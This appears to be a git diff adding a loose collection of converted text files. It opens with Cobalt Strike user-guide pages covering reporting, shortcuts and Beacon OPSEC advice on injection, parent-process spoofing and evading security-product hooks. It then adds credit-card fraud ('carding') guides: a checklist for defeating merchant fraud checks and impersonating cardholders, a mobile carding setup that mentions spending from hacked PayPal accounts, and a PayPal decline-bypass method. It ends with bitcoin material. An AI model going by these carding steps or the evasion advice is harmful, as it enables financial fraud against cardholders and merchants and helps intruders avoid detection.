+CobaltStrikeUserGuide www.fortra.com page:453
+
+AggressorScript/Report-OnlyFunctions
+layout
+Printsatablewithnobordersandnocolumnheaders.
+Arguments
+$1-anarraywithcolumnnames
+$2-anarraywithwidthvaluesforeachcolumn
+$3-anarraywithadictionaryobjectforeachrow.Thedictionaryshouldhavekeysthat
+correspondtoeachcolumn.
+Example
+@cols = @("First", "Second", "Third");
+@widths = @("2in", "2in", "auto");
+@rows = @(
+%(First => "a", Second => "b", Third => "c"),
+%(First => "1", Second => "2", Third => "3"));
+layout(@cols, @widths, @rows);
+list_unordered
+Printsanunorderedlist
+Arguments
+$1-anarraywithindividualbulletpoints.
+Example
+@list = @("apple", "bat", "cat");
+list_unordered(@list);
+nobreak
+Groupreportelementstogetherwithoutalinebreak.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:454
+
+AggressorScript/Report-OnlyFunctions
+$1-thefunctionwithreportelementstogrouptogether.
+Example
+# keep this stuff on the same page...
+nobreak({
+h2("I am the sub-title");
+p("I am the initial information");
+})
+output
+Printelementsagainstagreybackdrop.Line-breaksarepreserved.
+Arguments
+$1-thefunctionwithreportelementstogroupasoutput.
+Example
+output({
+p("This is line 1
+and this is line 2.");
+});
+p
+Printsaparagraphoftext.
+Arguments
+$1-thetexttoprint.
+Example
+p("I am some text!");
+p_formatted
+Printsaparagraphoftextwithsomeformatpreservation.
+CobaltStrikeUserGuide www.fortra.com page:455
+
+AggressorScript/Report-OnlyFunctions
+Arguments
+$1-thetexttoprint.
+TheFormatMarkup
+1.Thisfunctionpreservesnewlines
+2.Youmayspecifybulletedlists:
+* I am item 1
+* I am item 2
+* etc.
+3.Youmayspecifyaheading
+===I am a heading===
+Example
+p_formatted("===Hello World===\n\nThis is some text.\nI am on a new line\nAnd,
+I am:\n* Cool\n* Awesome\n* A bulleted list");
+table
+Printsatable
+Arguments
+$1-anarraywithcolumnnames
+$2-anarraywithwidthvaluesforeachcolumn
+$3-anarraywithadictionaryobjectforeachrow.Thedictionaryshouldhavekeysthat
+correspondtoeachcolumn.
+Example
+@cols = @("First", "Second", "Third");
+@widths = @("2in", "2in", "auto");
+@rows = @(
+CobaltStrikeUserGuide www.fortra.com page:456
+
+AggressorScript/Report-OnlyFunctions
+%(First => "a", Second => "b", Third => "c"),
+%(First => "1", Second => "2", Third => "3"));
+table(@cols, @widths, @rows);
+ts
+Printsatime/datestampinitalics.
+Example
+ts();
+CobaltStrikeUserGuide www.fortra.com page:457
+
+ReportingandLogging/Logging
+Reporting and Logging
+Logging
+CobaltStrikelogsallofitsactivityontheteamserver.Theselogsarelocatedinthelogs/ folder
+inthesamedirectoryyoustartedyourteamserverfrom.AllBeaconactivityisloggedherewith
+adateandtimestamp.
+Reports
+CobaltStrikehasseveralreportoptionstohelpmakesenseofyourdataandconveyastoryto
+yourclients.Youmayconfigurethetitle,description,andhostsdisplayedinmostreports.
+GototheReporting menu andchooseoneofthereportstogenerate.CobaltStrikewillexport
+yourreportasanMSWordorPDFdocument.
+figure77-ExportReportDialog
+Activity Report
+CobaltStrikeUserGuide www.fortra.com page:458
+
+ReportingandLogging/Reports
+Theactivityreportprovidesatimelineofredteamactivities.Eachofyourpost-exploitation
+activitiesaredocumentedhere.
+figure78-TheActivityReport
+Hosts Report
+ThehostsreportsummarizesinformationcollectedbyCobaltStrikeonahost-by-hostbasis.
+Services,credentials,andsessionsarelistedhereaswell.
+CobaltStrikeUserGuide www.fortra.com page:459
+
+ReportingandLogging/Reports
+figure79-TheHostsReport
+Indicators of Compromise
+ThisreportresemblesanIndicatorsofCompromiseappendixfromathreatintelligencereport.
+ContentincludesageneratedanalysisofyourMalleableC2profile,whichdomainyouused,and
+MD5hashesforfilesyou’veuploaded.
+CobaltStrikeUserGuide www.fortra.com page:460
+
+ReportingandLogging/Reports
+figure80-IndicatorsofCompromiseReport
+Sessions Report
+Thisreportdocumentsindicatorsandactivityonasession-by-sessionbasis.Thisreport
+includes:thecommunicationpatheachsessionusedtoreachyou,MD5hashesoffilesputon
+diskduringthatsession,miscellaneousindicators(e.g.,servicenames),andatimelineofpost-
+exploitationactivity.Thisreportisafantastictooltohelpanetworkdefenseteamunderstandall
+ofred’sactivityandmatchtheirsensorstoyouractivity.
+CobaltStrikeUserGuide www.fortra.com page:461
+
+ReportingandLogging/Reports
+figure81-TheSessionsReport
+Social Engineering
+Thesocialengineeringreportdocumentseachroundofspearphishingemails,whoclicked,and
+whatwascollectedfromeachuserthatclicked.Thisreportalsoshowsapplicationsdiscovered
+bythesystemprofiler.
+CobaltStrikeUserGuide www.fortra.com page:462
+
+ReportingandLogging/CustomLogoinReports
+figure82-TheSocialEngineeringReport
+Tactics, Techniques, and Procedures
+ThisreportmapsyourCobaltStrikeactionstotacticswithinMITRE’sATT&CKMatrix.The
+ATT&CKmatrixdescribeseachtacticwithdetectionandmitigationstrategies.Youmaylearn
+moreaboutMITRE’sATT&CKat:https://attack.mitre.org/
+Custom Logo in Reports
+CobaltStrikereportsdisplayaCobaltStrikelogoatthetopofthefirstpage.Youmayreplace
+thiswithanimageofyourchoosing.GotoCobalt Strike ->Preferences ->Reporting .
+CobaltStrikeUserGuide www.fortra.com page:463
+
+ReportingandLogging/CustomReports
+figure83-Preferences
+Yourcustomimageshouldbe1192x257pxsetto300dpi.The300dpisettingisnecessaryfor
+thereportingenginetorenderyourimageattherightsize.
+Youmayalsosetanaccentcolor.Thisaccentcoloristhecolorofthethicklinebelowyour
+imageonthefirstpageofthereport.Linksinsidereportsusetheaccentcolortoo.
+figure84-ACustomizedReport
+Custom Reports
+CobaltStrikeUserGuide www.fortra.com page:464
+
+ReportingandLogging/CustomReports
+CobaltStrikeusesadomainspecificlanguagetodefineitsreports.Youmayloadyourown
+reportsthroughtheReport Preferencesdialog.Tolearnmoreaboutthisfeature,consultthe
+CustomReportschapteroftheAggressorScriptdocumentation.
+CobaltStrikeUserGuide www.fortra.com page:465
+
+Appendix/ KeyboardShortcuts
+Appendix
+Keyboard Shortcuts
+Thefollowingkeyboardshortcutsareavailable.
+Shortcut Where Action
+Ctrl+A console selectalltext
+Ctrl+F console openfindtooltosearchtheconsole
+Ctrl+K console cleartheconsole
+Ctrl+Minus console decreasefontsize
+Ctrl+Plus console increasefontsize
+Ctrl+0 console resetfontsize
+Down console shownextcommandincommandhistory
+Escape console cleareditbox
+PageDown console scrolldownhalfascreen
+PageUp console scrolluphalfascreen
+Tab console completethecurrentcommand(insomeconsoletypes)
+Up console showpreviouscommandincommandhistory
+Ctrl+B everywhere sendcurrenttabtothebottomoftheCobaltStrikewindow
+Ctrl+D everywhere closecurrenttab
+Ctrl+Shift+D everywhere closealltabsexceptthecurrenttab
+Ctrl+E everywhere emptythebottomoftheCobaltStrikewindow(undoCtrl+B)
+Ctrl+I everywhere chooseasessiontointeractwith
+Ctrl+Left everywhere switchtoprevioustab
+Ctrl+O everywhere openpreferences
+Ctrl+R everywhere Renamethecurrenttab
+Ctrl+Right everywhere switchtonexttab
+Ctrl+T everywhere takescreenshotofcurrenttab(resultissenttoteamserver)
+Ctrl+Shift+T everywhere takescreenshotofCobaltStrike(resultissenttoteam
+server)
+CobaltStrikeUserGuide www.fortra.com page:466
+
+Appendix/BeaconCommandBehaviorandOPSECConsiderations
+Shortcut Where Action
+Ctrl+W everywhere opencurrenttabinitsownwindow
+Ctrl+C graph arrangesessionsinacircle
+Ctrl+H graph arrangesessionsinahierarchy
+Ctrl+Minus graph zoomout
+Ctrl+P graph saveapictureofthegraphdisplay
+Ctrl+Plus graph zoomin
+Ctrl+S graph arrangesessionsinastack
+Ctrl+0 graph resettodefaultzoom-level
+Ctrl+F tables openfindtooltofiltertablecontent
+Ctrl+A targets selectallhosts
+Escape targets clearselectedhosts
+TIP:
+ThefulllistofDefaultKeyboardShortcutsareavailablefromthemenu(Help -> Default
+Keyboard Shortcuts).
+Beacon Command Behavior and OPSEC Considerations
+Agoodoperatorknowstheirtoolsandhasanideaofhowthetoolisaccomplishingits
+objectivesontheirbehalf.ThisdocumentsurveysBeacon'scommandsandprovides
+backgroundonwhichcommandsinjectintoremoteprocesses,whichcommandsspawnjobs,
+andwhichcommandsrelyoncmd.exeorpowershell.exe.
+API-only
+ThefollowingcommandsarebuiltintoBeaconandrelyonWin32APIstomeettheirobjectives:
+cd
+cp
+connect
+download
+drives
+exit
+getprivs
+getuid
+inline-execute
+CobaltStrikeUserGuide www.fortra.com page:467
+
+Appendix/BeaconCommandBehaviorandOPSECConsiderations
+jobkill
+kill
+link
+ls
+make_token
+mkdir
+mv
+ps
+pwd
+rev2self
+rm
+rportfwd
+rportfwd_local
+setenv
+socks
+steal_token
+unlink
+upload
+House-keeping Commands
+ThefollowingcommandsarebuiltintoBeaconandexisttoconfigureBeaconorperformhouse-
+keepingactions.Someofthesecommands(e.g.,clear,downloads,help,mode,note)donot
+generateataskforBeacontoexecute.
+argue
+blockdlls
+cancel
+checkin
+clear
+downloads
+help
+jobs
+modedns
+modedns-txt
+modedns6
+note
+powershell-import
+ppid
+sleep
+socksstop
+spawnto
+Inline Execute (BOF)
+CobaltStrikeUserGuide www.fortra.com page:468
+
+Appendix/BeaconCommandBehaviorandOPSECConsiderations
+ThefollowingcommandsareimplementedasinternalBeaconObjectFiles.ABeaconObject
+FileisacompiledCprogram,writtentoacertainconvention,thatexecuteswithinaBeacon
+session.Thecapabilityiscleanedupafteritfinishesrunning.
+dllload
+elevatesvc-exe
+elevateuac-token-duplication
+getsystem
+jumppsexec
+jumppsexec64
+jumppsexec_psh
+kerberos_ccache_use
+kerberos_ticket_purge
+kerberos_ticket_use
+netdomain
+regquery
+regqueryv
+remote-execpsexec
+remote-execwmi
+runasadminuac-cmstplua
+runasadminuac-token-duplication
+timestomp
+ThenetworkinterfaceresolutionwithinboththeportscanandcovertvpndialogsusesaBeacon
+ObjectFileaswell.
+OPSECAdvice
+ThememoryforBeaconObjectFilesiscontrolledwithsettingsfromtheMalleableC2’s
+process-injectblock.
+Post-Exploitation Jobs (Fork&Run)
+ManyBeaconpost-exploitationfeaturesspawnaprocessandinjectacapabilityintothat
+process.Somepeoplecallthispatternfork&run.Beacondoesthisforanumberofreasons:(i)
+thisprotectstheagentifthecapabilitycrashes.(ii)historically,thisschememakesitseamless
+foranx86Beacontolaunchx64post-exploitationtasks.ThiswascriticalasBeacondidn'thave
+anx64builduntil2016.(iii)Somefeaturescantargetaspecificremoteprocess.Thisallowsthe
+post-exactiontooccurwithindifferentcontextswithouttheneedtomigrateorspawna
+payloadinthatothercontext.And(iv)thisdesigndecisionkeepsalotofclutter(threads,
+suspiciouscontent)generatedbyyourpost-exactionoutofyourBeaconprocessspace.Here
+arethefeaturesthatusethispattern:
+Fork&RunOnly
+CobaltStrikeUserGuide www.fortra.com page:469
+
+Appendix/BeaconCommandBehaviorandOPSECConsiderations
+covertvpn
+execute-assembly
+powerpick
+TargetExplicitProcessOnly
+browserpivot
+psinject
+Fork&RunorTargetExplicitProcess
+chromedump
+dcsync
+desktop
+hashdump
+keylogger
+logonpasswords
+mimikatz
+net*
+portscan
+printscreen
+pth
+screenshot
+screenwatch
+ssh
+ssh-key
+OPSECAdvice
+UsethespawntocommandtochangetheprocessBeaconwilllaunchforitspost-exploitation
+jobs.Thedefaultisrundll32.exe(youprobablydon’twantthat).Theppidcommandwillchange
+theparentprocessthesejobsarerununderaswell.Theblockdllscommandwillstopuserland
+hookingforsomesecurityproducts.MalleableC2'sprocess-injectblockgivesalotofcontrol
+overtheprocessinjectionprocess.MalleableC2'spost-exblockhasseveralOPSECoptionsfor
+thesepost-exDLLsthemselves.Forfeaturesthathaveanexplicitinjectionoption,consider
+injectingintoyourcurrentBeaconprocess.CobaltStrikedetectsandactsonself-injection
+differentfromremoteinjection.
+Explicitinjectionwillnotcleanupanymemoryafterthepost-exploitationjobhascompleted.The
+recommendationistoinjectintoaprocessthatcanbesafelyterminatedbyyoutocleanupin-
+memoryartifacts.
+Process Execution
+CobaltStrikeUserGuide www.fortra.com page:470
+
+Appendix/BeaconCommandBehaviorandOPSECConsiderations
+Thesecommandsspawnanewprocess:
+execute
+run
+runas
+runu
+OPSECAdvice
+Theppidcommandwillchangetheparentprocessofcommandsrunbyexecute.Theppid
+commanddoesnotaffectrunasorrunu.
+Process Execution (cmd.exe)
+Theshellcommanddependsoncmd.exe.Useruntorunacommandandgetoutputwithout
+cmd.exe
+Thepthcommandreliesoncmd.exetopassatokentoBeaconviaanamedpipe.The
+commandpatterntopassthistokenisanindicatorsomehost-basedsecurityproductslookfor.
+ReadHowtoPass-the-HashwithMimikatzforinstructionsonhowtodothismanually.
+Process Execution (powershell.exe)
+Thefollowingcommandslaunchpowershell.exetoperformsometaskonyourbehalf.
+jump
+winrm
+jumpwinrm64
+powershell
+remote-execwinrm
+OPSECAdvice
+Usetheppidcommandtochangetheparentprocesspowershell.exeisrununder.Usethe
+POWERSHELL_COMMANDAggressorScripthooktochangetheformatofthePowerShell
+commandanditsarguments.Thejump winrm,jump winrm64,andpowershell[whenascript
+isimported]commandsdealwithPowerShellcontentthatistoolargetofitinasingle
+command-line.Togetaroundthis,thesefeatureshostascriptonaself-containedwebserver
+withinyourBeaconsession.UsethePOWERSHELL_DOWNLOAD_CRADLEAggressorScript
+hooktoshapethedownloadcradleusedtodownloadthesescripts.
+Process Injection (Remote)
+CobaltStrikeUserGuide www.fortra.com page:471
+
+Appendix/BeaconCommandBehaviorandOPSECConsiderations
+Thepost-exploitationjobcommands(previouslymentioned)relyonprocessinjectiontoo.The
+othercommandsthatinjectintoaremoteprocessare:
+dllinject
+dllload
+inject
+shinject
+OPSECAdvice
+MalleableC2'sprocess-injectblockblockgivesalotofcontrolovertheprocessinjection
+process.Whenbeaconexitsaninjectedprocessitwillnotcleanitselffrommemoryandwillno
+longerbemaskedwhenthestage.sleep_maskissettotrue.Withthe4.5releasemostofthe
+heapmemorywillbeclearedandreleased.Recommendationistonotexitbeaconifyoudonot
+wanttoleavememoryartifactsunmaskedduringyourengagement.Whenyourengagementis
+doneitisrecommendedtorebootallofthetargetedsystemstoremoveanylingeringin-
+memoryartifacts.
+Process Injection (Spawn&Inject)
+Thesecommandsspawnatemporaryprocessandinjectapayloadorshellcodeintoit:
+elevateuac-token-duplication
+shspawn
+spawn
+spawnas
+spawnu
+spunnel
+spunnel_local
+OPSECAdvice
+Usethespawntocommandtosetthetemporaryprocesstouse.Theppidcommandsetsa
+parentprocessformostofthesecommands.Theblockdllscommandwillblockuserland
+hooksfromsomesecurityproducts.MalleableC2'sprocess-injectblockgivesalotofcontrol
+overtheprocessinjectionprocess.MalleableC2'spost-exblockprovidesoptionstoadjust
+Beacon'sin-memoryevasionoptions.
+Service Creation
+ThefollowinginternalBeaconcommandscreateaservice(eitheronthecurrenthostora
+remotetarget)torunacommand.ThesecommandsuseWin32APIstocreateandmanipulate
+services.
+CobaltStrikeUserGuide www.fortra.com page:472
+
+Appendix/UnicodeSupport
+elevatesvc-exe
+jumppsexec
+jumppsexec64
+jumppsexec_psh
+remote-execpsexec
+OPSECAdvice
+Thesecommandsuseaservicenamethatconsistsofrandomlettersandnumbersbydefault.
+TheAggressorScriptPSEXEC_SERVICEhookallowsyoutochangethisbehavior.Eachofthese
+commands(exceptingjumppsexec_pshandremote-execpsexec)generateaserviceEXEand
+uploadittothetarget.CobaltStrike'sbuilt-inserviceEXEspawnsrundll32.exe[withno
+arguments],injectsapayloadintoit,andexits.Thisisdonetoallowimmediatecleanupofthe
+executable.UsetheArtifactKittochangethecontentandbehaviorsofthegeneratedEXE.
+Unicode Support
+Unicodeisamapofcharactersintheworld'slanguagestoafixednumberorcode-point.This
+documentcoversCobaltStrike'ssupportforUnicodetext.
+Encodings
+Unicodeisamapofcharacterstonumbers(code-points),butitisnotanencoding.Anencoding
+isaconsistentwaytoassignmeaningtoindividualorbytesequencesbymappingthemto
+code-pointswithinthismap.
+Internally,Javaapplications,storeandmanipulatecharacterswiththeUTF-16encoding.UTF-
+16isanencodingthatusestwobytestorepresentcommoncharacters.Rarercharactersare
+representedwithfourbytes.CobaltStrikeisaJavaapplicationandinternally,CobaltStrikeis
+capableofstorage,manipulation,anddisplayoftextintheworld'svariouswritingsystems.
+There'snorealtechnicalbarriertothisinthecoreJavaplatform.
+IntheWindowsworld,thingsarealittledifferent.TheoptionsinWindowstorepresent
+charactersdateallthewaybacktotheDOSdays.DOSprogramsworkwithASCIItextandthose
+beautifulboxdrawingcharacters.Acommonencodingtomapnumbers0-127toUSASCIIand
+128-255tothosebeautifulboxdrawingcharactershasaname.It'scodepage437.Thereare
+severalvariationsofcodepage437thatmixthebeautifulboxdrawingcharacterswith
+charactersfromspecificlanguages.ThiscollectionofencodingsisknownasanOEMencoding.
+Today,eachWindowsinstancehasaglobalOEMencodingsetting.Thissettingdictateshowto
+interprettheoutputofbyteswrittentoaconsolebyaprogram.Tointerprettheoutputof
+cmd.exeproperly,it'simportanttoknowthetarget'sOEMencoding.
+CobaltStrikeUserGuide www.fortra.com page:473
+
+Appendix/UnicodeSupport
+Thefuncontinuesthough.TheboxdrawingcharactersareneededbyDOSprograms,butnot
+necessarilyWindowsprograms.So,withthat,WindowshastheconceptofanANSIencoding.
+It'saglobalsetting,liketheOEMencoding.TheANSIencodingdictateshowANSIWin32APIs
+willmapasequenceofbytestocode-points.TheANSIencodingforalanguageforgoesthe
+beautifulboxdrawingcharactersforcharactersusefulinthelanguagethatencodingis
+designedfor.Anencodingisnotnecessarilyconfinedtomappingonebytetoonecharacter.A
+variable-lengthencodingmayrepresentthemostcommoncharactersasasinglebyteandthen
+representothersassomemulti-bytesequence.
+ANSIencodingsarenotthefullstorythough.TheWindowsAPIsoftenhavebothANSIand
+Unicodevariants.AnANSIvariantofanAPIacceptsandinterpretsatextargumentasdescribed
+above.AUnicodeWin32APIexpectstextargumentsthatareencodedwithUTF-16.
+InWindows,therearemultipleencodingsituationspossible.There'sOEMencodingwhichcan
+representsometextinthetarget'sconfiguredlanguage.There'sANSIencodingwhichcan
+representmoretext,primarilyinthetarget'sconfiguredlanguage.And,there'sUTF-16which
+cancontainanycode-point.There'salsoUTF-8whichisavariable-lengthencodingthat'sspace
+efficientforASCIItext,butcancontainanycode-pointtoo.
+Beacon
+CobaltStrike'sBeaconreportsthetarget'sANSIandOEMencodingsaspartofitssession
+metadata.CobaltStrikeusesthesevaluestoencodetextinput,asneeded,tothetarget's
+encoding.CobaltStrikealsousesthesevaluestodecodetextoutput,asneeded,withthe
+target'sencoding.
+CobaltStrikeUserGuide www.fortra.com page:474
+
+Appendix/UnicodeSupport
+Ingeneral,thetranslationoftexttoandfromthetarget'sencodingistransparenttoyou.Ifyou
+workonatarget,configuredtoonelanguage,thingswillworkasyouexpect.
+Differentbehaviors,betweencommands,willshowupwhenyouworkwithmixedlanguage
+environments.Forexample,ifoutputcontainscharactersfromCyrillic,Chinese,andLatin
+alphabets,somecommandswillgetitright.Otherswon't.
+MostcommandsinBeaconusethetarget'sANSIencodingtoencodeinputanddecodeoutput.
+Thetarget'sconfiguredANSIencodingmayonlymapcharacterstocode-pointsforahandfulof
+writingsystems.IftheANSIencodingofthecurrenttargetdoesnotmapCyrilliccharacters,
+make_tokenwillnotdotherightthingwithausernameorpasswordthatusesCyrillic
+characters.
+Somecommand,inBeacon,useUTF-8forinputandoutput.Thesecommandswill,generally,
+dowhatyouexpectwithmixedlanguagecontent.ThisisbecauseUTF-8textcanmap
+characterstoanyUnicodecodepoint.
+ThefollowingtabledocumentswhichBeaconcommandsusesomethingotherthantheANSI
+encodingtodecodeinputandoutput:
+Command Input Encoding Output Encoding
+hashdump UTF-8
+mimikatz UTF-8 UTF-8
+powerpick UTF-8 UTF-8
+powershell UTF-16 OEM
+psinject UTF-8 UTF-8
+shell ANSI OEM
+NOTE:
+Forthosethatknowmimikatzwell,you'llnotethatmimikatzusesUnicodeWin32APIs
+internallyandUTF-16characters.WheredoesUTF-8comefrom?CobaltStrike'sinterface
+tomimikatzsendsinputasUTF-8andconvertsoutputtoUTF-8.
+SSH Sessions
+CobaltStrike'sSSHsessionsuseUTF-8encodingforinputandoutput.
+Logging
+CobaltStrike'slogsareUTF-8encodedtext.
+CobaltStrikeUserGuide www.fortra.com page:475
+
+Appendix/UnicodeSupport
+Fonts
+Yourfontmayhavelimitationsdisplayingcharactersfromsomewritingsystems.Tochange
+theCobaltStrikefonts:
+GotoCobalt Strike -> Preferences -> Cobalt StriketochangetheGUIFontvalue.Thiswill
+changethefontCobaltStrikeusesinitsdialogs,tables,andtherestoftheinterface.
+GotoCobalt Strike -> Preferences -> ConsoletochangetheFontusedbyCobaltStrike's
+consoles.
+Cobalt Strike -> Preferences -> GraphhasaFontoptiontochangethefontusedbyCobalt
+Strike'spivotgraph.
+CobaltStrikeUserGuide www.fortra.com page:476
diff --git a/howtobe a procarder carding checklist_txt.md b/howtobe a procarder carding checklist_txt.md
new file mode 100644
index 0000000..3596827
--- /dev/null
+++ b/howtobe a procarder carding checklist_txt.md
@@ -0,0 +1,58 @@
+# howtobe a procarder carding checklist
+
+
+---
+
+1. Always clear your history and clean cookies and change mac address.
+2. Always clear your flesh cookies.
+3. Vpn is not good for carding now as most of the ip of vpn have been
+blacklisted by Good shops.
+4. Always use socks5 which is live and not blacklisted.
+5. you should match the ip of same state and city.
+6. Always match the timezone of cc same state.
+7. Always try to type the details of cc as many site now have
+script to check copy paste of cc details as most of the time
+carders copy paste the details of cc. Actual owner always
+type all details.
+8. Get the maximum information of cc owner from background
+check sites there you can found DOB, MMN and sometimes SSN.
+Most of these sites are cardable with public cc.
+9. If you want to be a pro carder than stop using free email
+sites as yahoo, gmail, aol etc.
+10. Better solution is first card a domain and hosting and make
+a small site and then create a email of cc owner their
+of the same name on cc. you can also use free domain or
+sub domain sites but carding your host & domain is better.
+While carding domain and hosting you should use Amex cc
+as there is less chances of chargeback.
+11. Check the cc live before using site not on checker as sometimes
+it kills cc. Find a most easy cardable site and make a bogus account
+and checkout for small amount like 2$ if it work then go to original site.
+12. Always study the site carefully which you want to card and its seller.
+Most of the time seller who sell refurnished Mobiles etc are in hurry
+to ship the item. So search them.
+13. When you card some big Items of a new account from site it is suspicious.
+So you can make new a new account and leave it for some months after
+that card small items and always give good feedback.
+But the better way is to buy old accounts of the site with good feedback.
+14. Always Use Skype ac with credit and call forwarding services. If you call the
+shop with the number of cc owner and ask customer care of site some help
+before filling cc details your chances of success or much higher.
+You should always use it if you want to card high value items.
+15. Always Use Trusted drop of same country if you are carding a international
+Site. Because shipping to another country is always suspicious.
+16. Always try to carding on Weekends as shops not able to contact and verify
+extra details from bank by calling them. You can also check closing time of
+bank and card after closing timing of bank.
+17. Always Send a Email instantly to seller after order complete to ship order
+fast as you need it urgent as there is some function in your house.
+18. Don't use a cc at Same Site from different Accounts.Use it at one
+account maximum 3-4 Times.
+19. One of my friend Using a new trick he calls from the mobile number of cc
+owner with skype to the cc issuing bank that he is going to shop some
+goods and they should make the approval fast. I don't know the full trick
+and working on it you should also find your ways. If you succeed to convince
+cc issuing bank that you are original cc owner than you will rock with high
+amount purchase.
+20. If you use the pp in carding then buy pp with email access and
+delete the order related emails from inbox and trash box of email.
diff --git a/makemoneytradingbitcoin_txt.md b/makemoneytradingbitcoin_txt.md
new file mode 100644
index 0000000..9ce7482
--- /dev/null
+++ b/makemoneytradingbitcoin_txt.md
@@ -0,0 +1,6 @@
+# makemoneytradingbitcoin
+
+
+---
+
+https://www.youtube.com/watch?v=s5WE1tLWnjY
diff --git a/mobilecarding_pdf.md b/mobilecarding_pdf.md
new file mode 100644
index 0000000..bcbcf35
--- /dev/null
+++ b/mobilecarding_pdf.md
@@ -0,0 +1,63 @@
+# mobilecarding
+
+
+---
+
+ULTIMATE MOBILE CARDING
+SETUP
+Introduction to mobile Carding
+
+Hello there, Thank you for purchasing this awesome guide. Today you will learn how to setup
+your android phone to be your perfect carding device.
+First, setup account with ivacy vpn. Its pretty cheap because a 2 year subscription is only $39.99.
+Now download the ivacy vpn app from appstore and install on your phone. Log in and connect to a US
+server if you wish to card a US site.
+Now I know some of you might not have $39.99 to use on vpn so download and install “OpenVpn
+connect” from appstore. Sign up for a private tunnel account on https://www.privatetunnel.com/home/
+Next If you already have an account on the Private Tunnel service, go to OpenVpn Menu / Import /
+Import Private Tunnel Profile. Connect.
+The only reason I personally prefer ivacy over OpenVpn is there are servers all over the world. Unlike
+OpenVpn(Private tunnel) where we have only USA servers. Ivacy also does not leak DNS ever. So it
+creates our first line of defense.
+Next, we need a way to run socks5 on our phone. We have two options here, to root phone and
+use proxydroid or not to root and to use an app called postern. Both can be found on appstore. If you
+have the ability and courage to root your phone I’d advice rooting as proxydroid has more options on
+how many apps you want to be tunneled through socks5.
+Postern is a good alternative to those who don’t feel like rooting. It ensures all traffic goes through
+socks5. Now another thing, with these socks5 apps you need to get good quality socks5. The free socks5
+will definitely not work.
+After setting up VPN and Socks5 client you now should change your time to that of your victim if
+you wish to card well. After setting new time visit whoer.net to see % anonymity and then ip‐score.com
+to check for blacklists.
+Why I suggest ip‐score.com for blacklists is because it uses a fraud detection system known as maxmind
+which is used in major online shops.
+CARDING ADVICE
+For the best emails for carding use Gmail and/or yahoo. These always require phone verification while
+signing up and are therefore more trusted by online merchants compared to shitty mail.com and
+outlook.com
+You wonder how to bypass these phone verifications I know.
+So this verification is done by using the app from these site
+called >> www.textnow.com
+they have FREE, WORLDWIDE phone numbers
+that can make calls, and can receive any kind of SMS messages
+the only thing you will need to do is to sign up for a number
+on their site or download their app into a smartphone you control
+
+and signup through their app. Done, You can now open unlimited Gmail and Yahoo accounts. I
+personally use yahoo.
+Next is choice of socks5. If you have an account with luxsocks.ru that is one good source. If you don’t
+you can sign up to my other socks5 sources in the links given below
+1) http://www.proxyfire.net
+2) http://proxyblaze.com
+3) http://www.buysocks5.com
+Here are some other useful sites to check the quality of your IP and your setups:
+http://www.cyren.com/ip‐reputation‐check.html
+https://www.senderbase.org
+https://trustedsource.org
+https://www.fraudlabspro.com/demo (give you a rough idea whether your next transaction will go
+through or not)
+http://www.infosniper.net
+Final advice. DO NOT card shopify sites from a mobile device. You will likely kill your cards and fail
+On mobile apart from using CC’s you should also try Spending from Hacked PayPal accounts on the
+paypal app. This way you skip the phone verification.
+The End.
diff --git a/paypal declinerecovery techmnique_txt.md b/paypal declinerecovery techmnique_txt.md
new file mode 100644
index 0000000..47546eb
--- /dev/null
+++ b/paypal declinerecovery techmnique_txt.md
@@ -0,0 +1,59 @@
+# paypal declinerecovery techmnique
+
+
+---
+
+Sorry but your payment could not be processed at this time. Please return to merchant..
+
+Keep getting this??
+
+Not got a clue why??
+
+Follow this guide and things will be better!
+
+Step 1
+
+Clean you PC.
+Download CC Cleaner and make sure you wipe all the cache and cookies from your machine inc FLASH.
+Wipe Free space
+Make sure you do 35x Pass
+
+Step 2
+
+Download User Agent switcher for Firefox
+Link below
+https://addons.mozilla.org/en-US/fir...gent-switcher/
+
+or google it
+
+Download and install
+
+Step 3
+
+Open CMD and type
+Ipconfig /release
+Ipconfig /renew
+Ipconfig /flushdns
+
+To clear you ip and DNS cache
+
+step 4
+
+Open Firefox and in Tools you should now see a tab called Default User Agent
+
+Open the tap and select iphone 3.0 as the user agent
+
+Step 5
+
+Find a CLEAN and LOCAL Socks5 Not HTTP, Not Socks4 MUST BE 5 and MUST be clean. Make sure and check if the Socks is blacklisted
+
+Step 6
+
+Now log into the paypal you wish to use from paypal.com
+and KEEP IT OPEN in a new tab
+then Buy what you want.
+Click checkout and you should Bypass any errors
+
+If you still get this error I recommend Spoofing your MAC address
+
+Hope this helps.
diff --git a/readme.md b/readme.md
new file mode 100644
index 0000000..e69de29
diff --git a/requirements-convert-md_txt.md b/requirements-convert-md_txt.md
new file mode 100644
index 0000000..ad5eef7
--- /dev/null
+++ b/requirements-convert-md_txt.md
@@ -0,0 +1,7 @@
+# requirements-convert-md
+
+
+---
+
+pdfplumber>=0.11.0
+pypdf>=4.0.0
diff --git a/virtual bitcoin_pdf.md b/virtual bitcoin_pdf.md
new file mode 100644
index 0000000..5a0a7da
--- /dev/null
+++ b/virtual bitcoin_pdf.md
@@ -0,0 +1,692 @@
+# virtual bitcoin
+
+
+---
+
+Virtual Currency: The BitCoin Guide
+Virtual Currency:
+The BitCoin Guide
+By: Lachlan Roy
+http://lachlanroy.com
+Edited by: Justin Pot
+Cover Photo by Kushch Dmitry via Shutterstock
+This manual is the intellectual property of MakeUseOf. It must only be published in its
+original form. Using parts or republishing altered parts of this guide is prohibited.
+http://lachlanroy.com | Lachlan Roy
+Pa g e 2
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+Table of Contents
+Introduction .............................................................................................................................. 4
+BitCoin: The Virtual Currency ................................................................................................. 5
+What is BitCoin? .................................................................................................................... 5
+Why should I use BitCoin? ................................................................................................... 5
+Some downsides to using BitCoin ...................................................................................... 6
+How to use BitCoin .................................................................................................................. 7
+Getting a BitCoin wallet ...................................................................................................... 7
+Filling your wallet .................................................................................................................. 8
+Donations/Free BitCoins .................................................................................................. 9
+Currency Exchange ....................................................................................................... 10
+BitCoin Trading ................................................................................................................ 11
+Spending BitCoin ............................................................................................................... 11
+Securely Sync Your BitCoins ................................................................................................. 12
+Windows .............................................................................................................................. 12
+Mac OS X ............................................................................................................................ 14
+Ubuntu ................................................................................................................................. 15
+BitCoin Mining ..........................................................................Error! Bookmark not defined.
+What is BitCoin Mining? ..................................................................................................... 16
+What do I need to mine BitCoins?................................................................................... 17
+How do I mine BitCoins? ................................................................................................... 18
+Solo Mining .......................................................................................................................... 18
+Configuring the BitCoin Client ...................................................................................... 18
+Configuring DiabloMiner ............................................................................................... 19
+Mining Pool (BTC Guild) ..................................................................................................... 19
